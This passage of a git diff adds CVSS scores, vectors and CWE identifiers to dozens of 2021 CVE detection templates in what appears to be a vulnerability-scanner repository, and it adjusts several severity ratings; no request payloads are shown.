cve,cve2021,springboot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21234 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 83f46804d2..53b683b142 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -10,6 +10,11 @@ info: - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 tags: cve,cve2021,rce,lucee,adobe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21307 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index 13d9c5e2c7..a2289106db 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - https://security.netapp.com/advisory/ntap-20210312-0007/ tags: nodejs,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-21315 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index adec07c32f..5d83282a56 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -3,7 +3,7 @@ id: CVE-2021-21389 info: name: BuddyPress REST API Privilege Escalation to RCE author: lotusdll - severity: critical + severity: high description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE reference: - https://github.com/HoangKien1020/CVE-2021-21389 @@ -11,6 +11,11 @@ info: - https://codex.buddypress.org/releases/version-7-2-1/ - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 tags: cve,cve2021,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-21389 + cwe-id: CWE-863 requests: diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml index 816303d5e5..c3c29e4665 100644 --- a/cves/2021/CVE-2021-21402.yaml +++ b/cves/2021/CVE-2021-21402.yaml @@ -3,13 +3,18 @@ id: CVE-2021-21402 info: name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read author: dwisiswant0 - severity: high + severity: medium description: | Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. reference: https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ tags: cve,cve2021,jellyfin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-21402 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 5d60f46f48..befe4c3526 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -9,6 +9,11 @@ info: In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. tags: cve,cve2021,scimono,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.10 + cve-id: CVE-2021-21479 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml index 338eccbd88..7168dc705a 100644 --- a/cves/2021/CVE-2021-21801.yaml +++ b/cves/2021/CVE-2021-21801.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml index a3eeb5f61e..a17edd857e 100644 --- a/cves/2021/CVE-2021-21802.yaml +++ b/cves/2021/CVE-2021-21802.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml index 93a8fcf35e..1068d20cde 100644 --- a/cves/2021/CVE-2021-21803.yaml +++ b/cves/2021/CVE-2021-21803.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21803 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml index e8df776430..de4ad69f3f 100644 --- a/cves/2021/CVE-2021-21816.yaml +++ b/cves/2021/CVE-2021-21816.yaml @@ -7,6 +7,11 @@ info: severity: medium reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 tags: cve,cve2021,dlink,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-21816 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 4e9eb24eec..d69c8904d3 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -7,6 +7,11 @@ info: reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21972 + cwe-id: CWE-269 requests: - method: GET diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml index e7337d9775..043597989c 100644 --- a/cves/2021/CVE-2021-21975.yaml +++ b/cves/2021/CVE-2021-21975.yaml @@ -3,10 +3,15 @@ id: CVE-2021-21975 info: name: vRealize Operations Manager API SSRF (VMWare Operations) author: luci - severity: critical + severity: high description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983. tags: cve,cve2021,ssrf,vmware,vrealize reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-21975 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index 396c5b2fbc..5dc7d8641b 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -11,6 +11,11 @@ info: An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21978 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index ad807159dc..3c61e44f64 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -11,6 +11,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC tags: cve,cve2021,rce,vsphere + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21985 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 53c6058203..83ca4f6d61 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -11,6 +11,11 @@ info: - https://www.fortiguard.com/psirt/FG-IR-20-122 - https://twitter.com/ptswarm/status/1357316793753362433 tags: cve,cve2021,fortiweb,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22122 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml index e018f535d1..3a38bddc00 100644 --- a/cves/2021/CVE-2021-22145.yaml +++ b/cves/2021/CVE-2021-22145.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html tags: cve,cve2021,elascticsearch + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-22145 + cwe-id: CWE-209 requests: - method: POST diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index b4e407b056..f1fcc89ba3 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -3,13 +3,18 @@ id: CVE-2021-22214 info: author: Suman_Kar name: Unauthenticated Gitlab SSRF - CI Lint API - severity: medium + severity: high description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html tags: cve,cve2021,gitlab,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-22214 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index ba23365c25..f0ccf1f6b7 100644 --- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -3,10 +3,15 @@ id: CVE-2021-22873 info: name: Revive Adserver < 5.1.0 Open Redirect author: pudsec - severity: low + severity: medium description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873 tags: cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22873 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml index 508e2fda49..230b015a29 100644 --- a/cves/2021/CVE-2021-22986.yaml +++ b/cves/2021/CVE-2021-22986.yaml @@ -8,6 +8,10 @@ info: reference: - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - https://support.f5.com/csp/article/K03009991 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22986 requests: - raw: diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index 67b62f066e..da0426c806 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -9,6 +9,11 @@ info: - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 tags: cve,cve2021,iot,lfi,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-23241 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml index c950e67161..61d3d453df 100644 --- a/cves/2021/CVE-2021-24146.yaml +++ b/cves/2021/CVE-2021-24146.yaml @@ -7,6 +7,11 @@ info: severity: high reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc tags: wordpress,wp-plugin,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24146 + cwe-id: CWE-284 requests: - method: GET diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index 54bede3572..1d03f5739e 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-24176 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index faca3d5383..50b0897459 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -9,8 +9,13 @@ info: ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but it's possible to redirect the victim to any domain. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb - severity: low + severity: medium tags: wordpress,cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24210 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml index 6da6293c88..1178e0035a 100644 --- a/cves/2021/CVE-2021-24235.yaml +++ b/cves/2021/CVE-2021-24235.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24235 + cwe-id: CWE-79 + description: "The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue." requests: - method: GET diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml index 365eb7c2d9..c9842dc7c4 100644 --- a/cves/2021/CVE-2021-24237.yaml +++ b/cves/2021/CVE-2021-24237.yaml @@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24237 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 7fb471bc6f..d620d2d396 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24285 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml index d5b21f2ecd..5b0b13cded 100644 --- a/cves/2021/CVE-2021-24288.yaml +++ b/cves/2021/CVE-2021-24288.yaml @@ -7,6 +7,11 @@ info: description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription. reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 tags: wordpress,cve,cve2021,redirect,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24288 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml index 3d7e73cfbc..736f309f8a 100644 --- a/cves/2021/CVE-2021-24291.yaml +++ b/cves/2021/CVE-2021-24291.yaml @@ -7,6 +7,11 @@ info: reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24291 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml index 40b4fa673f..21462431a1 100644 --- a/cves/2021/CVE-2021-24298.yaml +++ b/cves/2021/CVE-2021-24298.yaml @@ -7,6 +7,11 @@ info: description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24298 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml index f4b9b78af4..9d76374f71 100644 --- a/cves/2021/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml @@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24316 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 408f23de62..458e6b28e6 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -9,6 +9,11 @@ info: - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24320 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml index 960dfbe32b..89d2be4bec 100644 --- a/cves/2021/CVE-2021-24335.yaml +++ b/cves/2021/CVE-2021-24335.yaml @@ -7,6 +7,11 @@ info: description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24335 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml index a20c217e53..498fb61986 100644 --- a/cves/2021/CVE-2021-24340.yaml +++ b/cves/2021/CVE-2021-24340.yaml @@ -3,13 +3,18 @@ id: CVE-2021-24340 info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection author: lotusdll - severity: critical + severity: high description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24340 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml index fa60b34342..8d0e643b50 100644 --- a/cves/2021/CVE-2021-24387.yaml +++ b/cves/2021/CVE-2021-24387.yaml @@ -10,6 +10,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress reference: https://cxsecurity.com/issue/WLB-2021070041 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24387 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml index 3b6b1bb833..024f7e7b87 100644 --- a/cves/2021/CVE-2021-24389.yaml +++ b/cves/2021/CVE-2021-24389.yaml @@ -7,6 +7,11 @@ info: description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24389 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml index 5ef2b21f2c..5663561a64 100644 --- a/cves/2021/CVE-2021-24406.yaml +++ b/cves/2021/CVE-2021-24406.yaml @@ -5,8 +5,13 @@ info: author: 0x_Akoko description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 - severity: low + severity: medium tags: wordpress,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24406 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index b45ea11b81..634ca3ad27 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -4,9 +4,14 @@ info: author: Suman_Kar name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. - severity: high + severity: critical reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a tags: cve,cve2021,wordpress,lfi,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24472 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 4a5b9a1610..19e4bf5b0d 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -9,6 +9,11 @@ info: reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index 64eccc35f9..249ee3cb41 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24498 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml index 9b24744f57..3636534b7b 100644 --- a/cves/2021/CVE-2021-25281.yaml +++ b/cves/2021/CVE-2021-25281.yaml @@ -7,6 +7,11 @@ info: reference: http://hackdig.com/02/hack-283902.htm description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. tags: cve,cve2021,saltapi,rce,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-25281 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index ca62a13683..6c596f1aad 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -3,12 +3,17 @@ id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu - severity: critical + severity: high reference: https://paper.seebug.org/1476/ description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-25646 + cwe-id: CWE-732 requests: - raw: diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 54134b92e1..223055583e 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -11,6 +11,11 @@ info: - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://github.com/Udyz/CVE-2021-26084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index d0462007ca..b1cf4c5442 100644 --- 